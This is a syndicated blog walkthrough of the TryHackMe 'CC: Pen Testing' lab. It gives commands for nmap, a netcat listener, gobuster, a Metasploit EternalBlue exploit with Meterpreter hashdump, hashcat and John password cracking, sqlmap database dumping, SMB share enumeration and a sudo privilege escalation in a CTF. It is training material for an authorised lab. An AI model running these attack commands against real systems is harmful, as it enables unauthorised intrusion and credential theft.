TryHackMe CC: Pen Testing - Full Walkthrough (2026)
DEV Community

TryHackMe CC: Pen Testing - Full Walkthrough (2026)

Note: I originally published this guide on my blog, Cracking Station. This is the syndicated version. Everything here is performed inside the TryHackMe CC: Pen Testing room - an authorised, sandboxed lab. Never run these tools against systems you don't own or have written permission to test.

I'm Mehmood Ali (Mr. Professor) - a CEH‑certified EC‑Council instructor. I've trained 1,700+ people, and the number‑one reason beginners stall is that they go deep before they go broad. CC: Pen Testing fixes that. It's a crash course that gives you one hands‑on pass over every core stage of a penetration test, then makes you chain them together in a final CTF. Here's how I approached every section.

Prerequisites

  • A free TryHackMe account.
  • The room: CC: Pen Testing.
  • The AttackBox, or your own Kali/Parrot box over OpenVPN.
  • A notes file open the whole time. Good notes separate people who finish rooms from people who redo them.

Section 1 - Network Utilities

Nmap

Most questions come straight from the man page (man nmap). Deploy the box and run:

nmap -sC -sV <target-ip>
  • -sV fingerprints service versions.
  • -sC runs the default scripts.

Read the version column first - a banner like vsftpd 2.3.4 is often an instant lead.

Netcat

Read man nc. You won't build a reverse shell here, but understanding a basic listener now makes later rooms click:

nc -lvnp 4444

Section 2 - Web Enumeration

Gobuster

Brute‑forces hidden paths from a wordlist:

gobuster dir -u http://<target-ip> \
  -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Add -x php,txt,html to find files too. Note the hidden directory - you'll need it in the exam, where the trick is to recurse into it.

Nikto

A fast web‑server vulnerability scanner. Where Gobuster finds content, Nikto finds problems. It's noisy, so it's a lab/authorised‑test tool, not a stealth one.

Section 3 - Metasploit

Launch with msfconsole. The workflow is always search → use → inspect:

search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
options

options lists required settings and hints most answers.

Meterpreter questions are about the post‑exploitation session you land in - learn getuid, sysinfo, hashdump and shell early.

For the final Metasploit task:

  1. Set RHOSTS to the machine IP.
  2. Set LHOST to your VPN IP (ip addr show tun0).
  3. exploit and read the flag.

#1 mistake: using your eth0 address instead of tun0 - if no session opens, check that first.

Section 4 - Hash Cracking

Salting = random data mixed in before hashing, so identical passwords produce different hashes. It defeats rainbow tables. The 2012 LinkedIn breach is the classic lesson - unsalted SHA‑1, cracked fast.

Hashcat

hashcat -m 17600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
  • -m is the hash mode (17600 = SHA3‑512).
  • -a 0 is a dictionary attack.
  • Change only -m for the other hashes.

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

Identifying the hash type is the real skill; cracking is the easy part.

Section 5 - SQL Injection

sqlmap automates detection and exploitation:

sqlmap -u http://<target-ip> --forms
sqlmap -u http://<target-ip> --forms --dump

The dump gives you the database and table names the questions ask for. Don't skip the manual part - learn how injection works by hand via the OWASP SQL Injection reference. Tools are for speed; understanding is what makes you employable.

Section 6 - Samba (SMB)

Misconfigured shares leak credentials, backups, and footholds.

  • smbmap lists shares and your permissions on each. Watch the permission column - a writable share is often the fastest path in.

  • smbclient gives an interactive prompt:

    apt install smbclient
    

    then connect and browse.

  • Impacket is worth bookmarking for later Active Directory rooms.

Section 7 - Final Exam (Mini‑CTF)

Everything chained on one box:

  1. nmap -sC -sV <target-ip> - map the services.
  2. Gobuster the web root.
  3. Recurse into the hidden directory you find (this is the step people miss).
  4. Recover the username + hashed password inside; crack the hash (Section 4).
  5. Log in and read the user flag:
    cd ~
    cat user.txt
    
  6. Escalate - on this box it needs no password:
    sudo su
    cd ~
    cat root.txt
    

Notice how the exam mirrors a real engagement: recon → web enum → credential attack → foothold → privilege escalation. Once that flow feels automatic, you're ready for harder targets.

I've deliberately left the flag values out - earn them yourself. If you get stuck, the full walkthrough with a video for every section is on my blog.

Conclusion

That's the whole CC: Pen Testing room - recon, web enumeration, exploitation, credential attacks, injection and SMB, plus a CTF that ties it together. The natural next step is going deeper on whichever stage you enjoyed most; my TryHackMe roadmap orders the next rooms so your skills compound. If this helped, a follow means a lot - I post beginner‑friendly cybersecurity walkthroughs regularly.

Read on DEV Community ↗ ← Back to News

Comments

No comments yet. Start the discussion.